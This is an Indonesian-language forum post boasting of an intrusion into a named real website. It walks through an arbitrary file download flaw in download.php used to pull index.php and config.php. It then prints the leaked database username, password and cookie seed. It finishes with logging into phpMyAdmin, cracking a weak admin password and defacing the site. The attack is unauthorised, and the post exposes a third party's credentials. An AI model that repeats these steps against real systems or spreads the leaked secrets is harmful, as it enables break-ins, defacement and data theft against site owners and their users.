In The Name Of Allah
ana gak ingin apa-apa dari posting ana ini..
cuma ingin ridho Allah Ta'ala...
sebelumnya ana minta afwan kepada soa members yang jadi bagian staf cyberdos...
Ana tidak ada dendam dengan sapa pun disana...Ana minta afwan dengan sebesar-besarnya..
kebetulan cyberdos sudah tidak bisa di akses..
maka ana akan coba jabarkan poc yang ana buat ketika coba masuk ke database n web nya cyberdos...
Bismillah...
pada awalnya hanya ingin baca thread n lagi cari link download beberapa software yang ingin ana cari...
setelah coba obrak abrik thread disana..
ana coba masuk ke menu download yang tersedia di web nya cyberdos...
http://cyberdos.org/download.php
w00t!!!
ana lihat ada error...
ERROR : download file NOT SPECIFIED . USE force-download.php?file=filepath ana langsung kaget...
ada RFD ne...
coba ana buat spekulasi
http://cyberdos.org/download.php?file=index.php
W00t!!!
ana diminta untuk download file index.php
ternyata server cyberdos mengizinkan ana melihat langsung script client side nya...index.php!!!
aksi berikutnya...
setelah yakin kalau ini benar vulnarable RFD..
menuju url..
http://cyberdos.org/download.php?file=config.php
w00t!!!
config.php nya telah di dapat...
- Code:
-
<?php
$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'peace_cyberdos';
$db_username = 'peace_cyberdos';
$db_password = '30032006';
$db_prefix = 'punbb_';
$p_connect = false;
$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'bbc64b7deec4260f';
$BoardFounder = 'admin@cyberdos.org';
$TimeOut = '300'; // Time in seconds before the authorization key times out
define('PUN', 1);
terlihat jelas disana...
$db_username = 'peace_cyberdos';
$db_password = '30032006';
username database => peace_cyberdos
password => 30032006
w00t!!!
skarang tinggal masuk ke cpanel...
http://cyberdos.org:2082
hasilnya not found..
berikutnya coba masuk ke phpmyadminnya...
http://cyberdos.org/phpmyadmin
setelah masukkan username n password yang di dapat...
bingo!!!!
mission complate...
database has been owned....
tinggal cari pass superadmin...
crack..
wew..
ternyata weak password..
tinggal login di sebagai admin...
cyberdos has been owned...
yang eksekusi n deface teman ana...
ana cuma founder bugs aja...
kebetulan kmaren kelupa mau buat dokumentasi ketika proses attacking...
maka ana sertakan dokumentasi dari bugs yang sama persis dari kk xshadow...
silahkan download akhi fillah smua..
Link downloadJazakallah khair